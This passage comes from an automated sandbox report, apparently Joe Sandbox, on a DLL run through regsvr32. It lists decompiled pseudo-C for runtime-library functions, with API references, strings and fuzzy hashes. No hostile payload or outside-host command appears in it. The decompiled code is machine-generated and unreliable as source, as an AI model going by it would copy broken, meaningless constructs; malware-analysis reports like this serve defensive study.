				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
				if (_t61 == _t101) goto 0x800046eb;
				if (_t61 != 0) goto 0x800046ed;
				if (__r8 == __r9) goto 0x800046e3;
				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
				if (_t67 == 0) goto 0x8000462e;
				if (_t67 != _t101) goto 0x800046c5;
				goto 0x80004699;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x800046a5;
				if (GetLastError() != 0x57) goto 0x80004687;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00000001180007070(__r8) == 0) goto 0x80004687;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x800046a5;
				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
				goto 0x8000460c;
				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x800046c5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x800046e3;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
				goto 0x800046ed;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
				return 0;
			}

0x1800045bc
0x1800045c1
0x1800045c6
0x1800045e1
0x1800045ee
0x1800045fa
0x180004603
0x18000460c
0x180004615
0x180004621
0x180004626
0x18000462c
0x18000463b
0x180004641
0x180004647
0x18000464d
0x180004658
0x18000465a
0x18000465a
0x18000466f
0x180004671
0x180004679
0x180004685
0x180004691
0x1800046a0
0x1800046af
0x1800046af
0x1800046af
0x1800046ba
0x1800046bf
0x1800046cb
0x1800046d4
0x1800046d9
0x1800046e1
0x1800046e3
0x180004709

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB

Strings

api-ms-, xrefs: 0000000180004661

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007DB8 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000000180007DC7
FlsGetValue.KERNEL32 ref: 0000000180007DDC
FlsSetValue.KERNEL32 ref: 0000000180007DFD
FlsSetValue.KERNEL32 ref: 0000000180007E2A
FlsSetValue.KERNEL32 ref: 0000000180007E3B
FlsSetValue.KERNEL32 ref: 0000000180007E4C
SetLastError.KERNEL32 ref: 0000000180007E67

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F374 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000000018000F3A5
GetLastError.KERNEL32 ref: 000000018000F3B1
CloseHandle.KERNEL32 ref: 000000018000F3C9
CreateFileW.KERNEL32 ref: 000000018000F3F4
WriteConsoleW.KERNEL32 ref: 000000018000F413

Strings

CONOUT$, xrefs: 000000018000F3D5

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014C90 Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 0000000180014CBF
LoadStringW.USER32 ref: 0000000180014CDC

Part of subcall function 00000001800109D0: LoadCursorW.USER32 ref: 0000000180010A22
Part of subcall function 00000001800109D0: RegisterClassExW.USER32 ref: 0000000180010A59

Part of subcall function 0000000180010910: CreateWindowExW.USER32 ref: 000000018001098A

GetMessageW.USER32 ref: 0000000180014D0F
TranslateAcceleratorW.USER32 ref: 0000000180014D25
TranslateMessage.USER32 ref: 0000000180014D34
DispatchMessageW.USER32 ref: 0000000180014D3F

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
String ID:
API String ID: 1967609040-0
Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003B5C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t101;
				void* _t109;
				intOrPtr _t111;
				signed int* _t115;
				intOrPtr* _t136;
				void* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t159;

				_t109 = _t144;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rbp;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				_t136 = __rcx;
				_t139 = __r9;
				_t159 = __r8;
				_t142 = __rdx;
				E00000001180004584(_t55, __r8);
				E00000001180002D40(_t109);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
				if ( *__rcx != 0x80000029) goto 0x80003bc2;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
				if ( *__rcx == 0x80000026) goto 0x80003bde;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
				if (_t115[1] == 0) goto 0x80003d6d;
				if (_a48 != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
				if ( *__rcx != 0x80000026) goto 0x80003c41;
				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
				r9d = _t60;
				E000000011800040F0(_t109, _t142, __r9, _t115);
				goto 0x80003d6d;
				if ( *_t136 != 0x80000029) goto 0x80003c63;
				r9d =  *((intOrPtr*)(_t136 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
				goto 0x80003c31;
				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
				goto 0x80003d6d;
				if (_t115[3] != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
				_t101 = _t115[8];
				if (_t101 == 0) goto 0x80003c9e;
				E00000001180002408(_t109);
				if (_t101 != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
				_t111 =  *((intOrPtr*)(_t136 + 0x30));
				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
				E0000000118000241C(_t111);
				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x80016370(_t158);
				goto 0x80003d72;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
				return 1;
			}

0x180003b5c
0x180003b5f
0x180003b63
0x180003b67
0x180003b6b
0x180003b75
0x180003b78
0x180003b7e
0x180003b81
0x180003b84
0x180003b89
0x180003b8e
0x180003ba4
0x180003bac
0x180003bb0
0x180003bb6
0x180003bc0
0x180003bc4
0x180003bd2
0x180003bd8
0x180003be2
0x180003bec
0x180003bfa
0x180003c04
0x180003c08
0x180003c14
0x180003c1c
0x180003c25
0x180003c2b
0x180003c37
0x180003c3c
0x180003c43
0x180003c45
0x180003c4d
0x180003c57
0x180003c61
0x180003c6c
0x180003c71
0x180003c7a
0x180003c88
0x180003c8a
0x180003c8e
0x180003c90
0x180003c9c
0x180003caa
0x180003cb8
0x180003cc4
0x180003cca
0x180003cd3
0x180003cd5
0x180003cdd
0x180003cdf
0x180003cf2
0x180003d09
0x180003d18
0x180003d20
0x180003d27
0x180003d2c
0x180003d32
0x180003d3f
0x180003d51
0x180003d5f
0x180003d63
0x180003d68
0x180003d8c

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180003B84
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000000180003C6C
__std_exception_copy.LIBVCRUNTIME ref: 0000000180003DB8

Strings

csm, xrefs: 0000000180003CBE
csm, xrefs: 0000000180003BA6

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
String ID: csm$csm
API String ID: 851805269-3733052814
Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002A84 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00000001180004584(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0x80002b9e;
				if (_t178 - _t130 >= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0x80002ba5;
				if (_t113 <= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
				if ( *0x800164f8 == 0) goto 0x80002b5b;
				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
				_t83 =  *0x800164f8();
				r8d = 1;
				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00000001180004580(_t84);
				goto 0x80002ada;
				goto 0x80002c5d;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0x80002c4e;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0x80002c4c;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0x80002c4c;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0x80002c21;
				r9d = 0;
				if (_t101 == 0) goto 0x80002c1c;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0x80002c14;
				if (_t156 - _t133 >= 0) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0x80002be4;
				if (r9d != _t101) goto 0x80002c58;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
				if (_t156 != _t133) goto 0x80002c4c;
				if (r10d != 0) goto 0x80002c58;
				goto 0x80002c4c;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
				return 1;
			}

0x180002a84
0x180002a84
0x180002a89
0x180002a8e
0x180002a9c
0x180002aa0
0x180002aa3
0x180002aac
0x180002aaf
0x180002ab4
0x180002abb
0x180002abf
0x180002ac6
0x180002aca
0x180002ad0
0x180002ad5
0x180002adc
0x180002ae4
0x180002aee
0x180002afb
0x180002b06
0x180002b11
0x180002b24
0x180002b26
0x180002b28
0x180002b31
0x180002b3b
0x180002b4b
0x180002b55
0x180002b5f
0x180002b6b
0x180002b77
0x180002b7e
0x180002b85
0x180002b8a
0x180002b8e
0x180002b93
0x180002b99
0x180002ba0
0x180002ba7
0x180002bb0
0x180002bb3
0x180002bba
0x180002bc4
0x180002bce
0x180002bd1
0x180002bd3
0x180002bd7
0x180002bdb
0x180002bdd
0x180002be2
0x180002be4
0x180002be7
0x180002bf2
0x180002bfc
0x180002c07
0x180002c12
0x180002c14
0x180002c1a
0x180002c1f
0x180002c27
0x180002c2c
0x180002c31
0x180002c33
0x180002c3b
0x180002c3f
0x180002c49
0x180002c52
0x180002c7a

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180002AAF
_IsNonwritableInCurrentImage.LIBCMT ref: 0000000180002B44
RtlUnwindEx.KERNEL32 ref: 0000000180002B93

Strings

f, xrefs: 0000000180002AC2
csm, xrefs: 0000000180002B2A

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006108 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000000018000612D
GetProcAddress.KERNEL32 ref: 0000000180006143
FreeLibrary.KERNEL32 ref: 000000018000616A

Strings

CorExitProcess, xrefs: 000000018000613C
mscoree.dll, xrefs: 0000000180006124

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800077FC Relevance: 7.6, APIs: 5, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
				if (sil >= 0) goto 0x8000782e;
				E0000000118000BC4C(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x80007885;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x80007849;
				asm("dec eax");
				if (_t42 >= 0) goto 0x80007849;
				E0000000118000BC4C(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x80007885;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x80007865;
				asm("dec eax");
				if (_t43 >= 0) goto 0x80007865;
				E0000000118000BC4C(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x80007885;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x80007885;
				asm("dec eax");
				if (_t44 >= 0) goto 0x80007885;
				if ((dil & 0x00000010) == 0) goto 0x80007882;
				E0000000118000BC4C(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x8000789f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x8000789f;
				E0000000118000BC4C(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}

0x1800077fc
0x180007801
0x180007810
0x180007818
0x18000781d
0x180007824
0x180007829
0x18000782c
0x180007833
0x180007836
0x180007838
0x18000783d
0x18000783f
0x180007844
0x180007847
0x180007849
0x18000784d
0x18000784f
0x180007854
0x18000785b
0x180007860
0x180007863
0x180007865
0x180007869
0x18000786b
0x180007870
0x180007876
0x18000787d
0x180007882
0x180007885
0x180007889
0x18000788b
0x180007890
0x180007897
0x1800078b5

APIs

_set_statfp.LIBCMT ref: 0000000180007824
_set_statfp.LIBCMT ref: 000000018000783F
_set_statfp.LIBCMT ref: 000000018000785B
_set_statfp.LIBCMT ref: 0000000180007897

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007FF8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
